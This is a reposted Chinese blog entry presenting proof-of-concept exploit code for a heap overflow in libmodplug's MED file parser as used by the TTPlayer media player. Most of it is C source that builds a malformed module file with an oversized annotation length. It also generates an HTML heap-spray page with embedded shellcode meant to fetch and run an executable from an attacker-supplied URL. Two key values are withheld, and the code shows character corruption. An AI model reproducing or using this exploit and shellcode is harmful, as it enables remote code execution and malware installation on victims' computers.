博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
千千静听 med 文件格式堆溢出的成功利用 | 鬼仔????s Blog
阅读量:2400 次
发布时间:2019-05-10

本文共 6847 字,大约阅读时间需要 22 分钟。

导读:

上个月看的洞,昨天晚上又重新翻看了一下这个洞,终于看到了成功利用的可能性。

远程和本地攻击最后都可以,本地攻击成功比较低一些,头疼。
详细的利用代码不贴了,详细可以看看 libmod 的源码

下面是远程部分 poc, 2个关键 DWORD 值隐藏了.

代码:

/*
libmodplug v0.8
load_med.cpp
BOOL CSoundFile::ReadMed(const BYTE *lpStream, DWORD dwMemLength)
line 670: memcpy(m_lpszSongComments, lpStream+annotxt, annolen);

千千静听使用的是 libmod 来进行 mod 类文件格式的处理, 此库在 ReadMed 函数中,没有检查

文件描述的长度,如果传递一个恶意构造的值,将导致堆溢出。
现在采用libmod 软件很多,都应该存在此问题。

*/

/*

author: dummy
e-mail: dummyz@126.com

date: 2008/02/25

*/

#include

#include

#pragma pack(1)

typedef struct tagMEDMODULEHEADER

{
DWORD id; // MMD1-MMD3
DWORD modlen; // Size of file
DWORD song; // Position in file for this song
WORD psecnum;
WORD pseq;
DWORD blockarr; // Position in file for blocks
DWORD mmdflags;
DWORD smplarr; // Position in file for samples
DWORD reserved;
DWORD expdata; // Absolute offset in file for ExpData (0 if not present)
DWORD reserved2;
WORD pstate;
WORD pblock;
WORD pline;
WORD pseqnum;
WORD actplayline;
BYTE counter;
BYTE extra_songs; // # of songs - 1
} MEDMODULEHEADER;

typedef struct tagMMD0SAMPLE

{
WORD rep, replen;
BYTE midich;
BYTE midipreset;
BYTE svol;
signed char strans;
} MMD0SAMPLE;

// MMD0/MMD1 song header

typedef struct tagMMD0SONGHEADER
{
MMD0SAMPLE sample[63];
WORD numblocks; // # of blocks
WORD songlen; // # of entries used in playseq
BYTE playseq[256]; // Play sequence
WORD deftempo; // BPM tempo
signed char playtransp; // Play transpose
BYTE flags; // 0×10: Hex Volumes | 0×20: ST/NT/PT Slides | 0×40: 8 Channels song
BYTE flags2; // [b4-b0]+1: Tempo LPB, 0×20: tempo mode, 0×80: mix_conv=on
BYTE tempo2; // tempo TPL
BYTE trkvol[16]; // track volumes
BYTE mastervol; // master volume
BYTE numsamples; // # of samples (max=63)
} MMD0SONGHEADER;

typedef struct tagMMD0EXP

{
DWORD nextmod; // File offset of next Hdr
DWORD exp_smp; // Pointer to extra instrument data
WORD s_ext_entries; // Number of extra instrument entries
WORD s_ext_entrsz; // Size of extra instrument data
DWORD annotxt;
DWORD annolen;
DWORD iinfo; // Instrument names
WORD i_ext_entries;
WORD i_ext_entrsz;
DWORD jumpmask;
DWORD rgbtable;
BYTE channelsplit[4]; // Only used if 8ch_conv (extra channel for every nonzero entry)
DWORD n_info;
DWORD songname; // Song name
DWORD songnamelen;
DWORD dumps;
DWORD mmdinfo;
DWORD mmdrexx;
DWORD mmdcmd3x;
DWORD trackinfo_ofs; // ptr to song->numtracks ptrs to tag lists
DWORD effectinfo_ofs; // ptr to group ptrs
DWORD tag_end;
} MMD0EXP;

#pragma pack()

// Byte swapping functions from the GNU C Library and libsdl

/* Swap bytes in 16 bit value. */

#ifdef __GNUC__
# define bswap_16(x) /
(__extension__ /
({ unsigned short int __bsx = (x); /
((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8)); }))
#else
static __inline unsigned short int
bswap_16 (unsigned short int __bsx)
{
return ((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8));
}
#endif

/* Swap bytes in 32 bit value. */

#ifdef __GNUC__
# define bswap_32(x) /
(__extension__ /
({ unsigned int __bsx = (x); /
((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0×00ff0000) >> 8) | /
(((__bsx) & 0×0000ff00) << 8) | (((__bsx) & 0×000000ff) << 24)); }))
#else
static __inline unsigned int
bswap_32 (unsigned int __bsx)
{
return ((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0×00ff0000) >> 8) |
(((__bsx) & 0×0000ff00) << 8) | (((__bsx) & 0×000000ff) << 24));
}
#endif

#ifdef WORDS_BIGENDIAN

#define bswapLE16(X) bswap_16(X)
#define bswapLE32(X) bswap_32(X)
#define bswapBE16(X) (X)
#define bswapBE32(X) (X)
#else
#define bswapLE16(X) (X)
#define bswapLE32(X) (X)
#define bswapBE16(X) bswap_16(X)
#define bswapBE32(X) bswap_32(X)
#endif

#define FILE_SIZE_ 0×30000

// 远程攻击
#if 0
// 成功率很低
#define NOP_ "/"%u090a?/""
#define HEAP_ADDR_ 码
#else
// 成功率很高
#define NOP_ "/"邐邐/""
#define HEAP_ADDR_ 码

#endif

const unsigned char shellcode[174] =

{
// 必须是偶数大小
0xE8, 0×00, 0×00, 0×00, 0×00, 0×6A, 0×03, 0xEB, 0×21, 0×7E, 0xD8, 0xE2, 0×73, 0×98, 0xFE, 0×8A,
0×0E, 0×8E, 0×4E, 0×0E, 0xEC, 0×55, 0×52, 0×4C, 0×4D, 0×4F, 0×4E, 0×00, 0×00, 0×36, 0×1A, 0×2F,
0×70, 0×63, 0×3A, 0×5C, 0×63, 0×2E, 0×65, 0×78, 0×65, 0×00, 0×59, 0×5F, 0xAF, 0×67, 0×64, 0xA1,
0×30, 0×00, 0×8B, 0×40, 0×0C, 0×8B, 0×70, 0×1C, 0xAD, 0×8B, 0×68, 0×08, 0×51, 0×8B, 0×75, 0×3C,
0×8B, 0×74, 0×2E, 0×78, 0×03, 0xF5, 0×56, 0×8B, 0×76, 0×20, 0×03, 0xF5, 0×33, 0xC9, 0×49, 0×41,
0xAD, 0×03, 0xC5, 0×33, 0xDB, 0×0F, 0xBE, 0×10, 0×38, 0xF2, 0×74, 0×08, 0xC1, 0xCB, 0×0D, 0×03,
0xDA, 0×40, 0xEB, 0xF1, 0×3B, 0×1F, 0×75, 0xE7, 0×5E, 0×8B, 0×5E, 0×24, 0×03, 0xDD, 0×66, 0×8B,
0×0C, 0×4B, 0×8B, 0×5E, 0×1C, 0×03, 0xDD, 0×8B, 0×04, 0×8B, 0×03, 0xC5, 0xAB, 0×59, 0xE2, 0xBC,
0×8B, 0×0F, 0×80, 0xF9, 0×63, 0×74, 0×0A, 0×57, 0xFF, 0xD0, 0×95, 0xAF, 0xAF, 0×6A, 0×01, 0xEB,
0xAC, 0×52, 0×52, 0×57, 0×8D, 0×8F, 0xDB, 0×10, 0×40, 0×00, 0×81, 0xE9, 0×4E, 0×10, 0×40, 0×00,
0×51, 0×52, 0xFF, 0xD0, 0×6A, 0×01, 0×57, 0xFF, 0×57, 0xEC, 0xFF, 0×57, 0xE8, 0×90
};

const char* script1 = /

"<script>"
"var sc=unescape(/"";
const char* script2 = /
"/");"
"fb=unescape(" NOP_ ");"
"while(fb.length<0×30000)fb+=fb;"
"m=new Array();"
"for(x=0;x<400;x++)m[x]=sc+fb+sc;"
"setTimeout(/'ttp.URL=/"";
const char* script3 = /
"/";ttp.controls.play();/', 3);</script>"
""
"";

void make_med_file(const char* path)

{
MEDMODULEHEADER mmh;
MMD0SONGHEADER msh;
MMD0EXP mex;
FILE* file;
long p;

memset(&mmh, 0, sizeof (mmh));

memset(&msh, 0, sizeof (msh));
memset(&mex, 0, sizeof (mex));

p = 0;

mmh.id = 0×30444D4D; // version = '0'

p += sizeof (MEDMODULEHEADER);

mmh.song = bswapBE32(p);

p += sizeof (MMD0SONGHEADER);

mmh.expdata = bswapBE32(p);

p += sizeof (MMD0EXP);

mex.annolen = bswapBE32(-1);
mex.annotxt = bswapBE32(p);

file = fopen(path, "wb+");

if ( file == NULL )
{
printf("create file failed!/n");
exit(0);
}
else
{
fwrite(&mmh, 1, sizeof (mmh), file);
fwrite(&msh, 1, sizeof (msh), file);
fwrite(&mex, 1, sizeof (mex), file);

while ( ftell(file) < FILE_SIZE_ )

{
fwrite(HEAP_ADDR_, 1, 4, file);
}

fclose(file);

printf("successed!/n");
}
}

void make_htlm_file(const char* htmlpath, const char* s3mpath, const char* url)

{
FILE *file = fopen(htmlpath, "w+");
if ( file == NULL )
{
printf("create '%s' failed!/n", htmlpath);
exit(0);
}

fprintf(file, "%s", script1);

for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);

const unsigned l = strlen(url);

for ( unsigned j = 0; j < l; j += 2 )
fprintf(file, "%%u%02X%02X" , url[j + 1], url[j]);

fprintf(file, "%s%s%s", script2, s3mpath, script3);

fclose(file);

printf("make '%s' successed!/n", htmlpath);

}

int main(int argc, char* argv[])

{
printf("ttplayer stack exp poc by dummyz@126.com/n");
if ( argc <= 1 )
{
printf("need argv!(ex: %s http://xxx.xxx/xx.exe/n", argv[0]);
return -1;
}

printf("+ make_med_file…/n");

make_med_file("c://shit.s3m");

printf("+ make_htlm_file…/n");

make_htlm_file("poc.html", "c://shit.s3m", argv[1]);

printf("done./n");

return 0;

}

Tags: , ,
本文转自

转载地址:http://njiob.baihongyu.com/

你可能感兴趣的文章
tahiti.oracle.com
查看>>
系统安装到用raid做成的逻辑驱动器上不能启动的一个原因!
查看>>
informix 10.0 extent size 的大小限制和数量限制
查看>>
zhouwf0726
查看>>
Oracle字符集问题总结(转贴)
查看>>
SuSE Linux 10.0安装oracle的时候老是提示检查操作系统版本
查看>>
64位SuSE Linux 10.0安装的时候出现黑屏
查看>>
网页特效(三)
查看>>
我的心情*
查看>>
eagle_fan
查看>>
rcp 安装配置
查看>>
etrm
查看>>
测试使用标准I/O进行Informix同时备份和恢复
查看>>
metalink
查看>>
顶点财经
查看>>
在SLES中如何修改主机名(zt)
查看>>
Install iSCSI target for Linux with kernel 2.6.14(zt)
查看>>
不胜人生一场醉
查看>>
在红帽Linux企业版中,使用什么iSCSI目标端软件?(zt)
查看>>
集群的应用实例(zt)
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2024-07-05 19:43:41   当前IP: 3.141.29.48   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我